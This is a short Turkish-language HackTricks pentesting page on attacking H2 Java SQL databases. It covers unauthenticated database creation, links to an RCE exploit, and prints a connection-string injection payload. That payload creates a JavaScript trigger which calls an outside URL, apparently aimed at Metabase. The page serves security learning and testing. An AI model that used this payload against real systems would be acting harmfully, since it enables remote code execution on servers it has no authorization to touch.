3.7 KiB
H2 - Java SQL veritabanı
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live bizi takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Resmi sayfa: https://www.h2database.com/html/main.html
Erişim
Geçersiz bir veritabanı adı belirterek geçerli kimlik bilgileri olmadan yeni bir veritabanı oluşturabilirsiniz (kimlik doğrulaması yapılmamış):
Ya da örneğin bir mysql çalışıyorsa ve o veritabanının adı ve kimlik bilgileri hakkında bilginiz varsa, doğrudan erişebilirsiniz:
HTB'nin Hawk kutusundan bir ipucu.
RCE
H2 veritabanı ile iletişim kurma erişiminiz varsa, RCE elde etmek için bu istismarı kontrol edin: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
H2 SQL Enjeksiyonu ile RCE
bu yazıda bir yük, SQL Enjeksiyonu istismar ederek H2 veritabanı üzerinden RCE elde etmek için açıklanmaktadır.
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.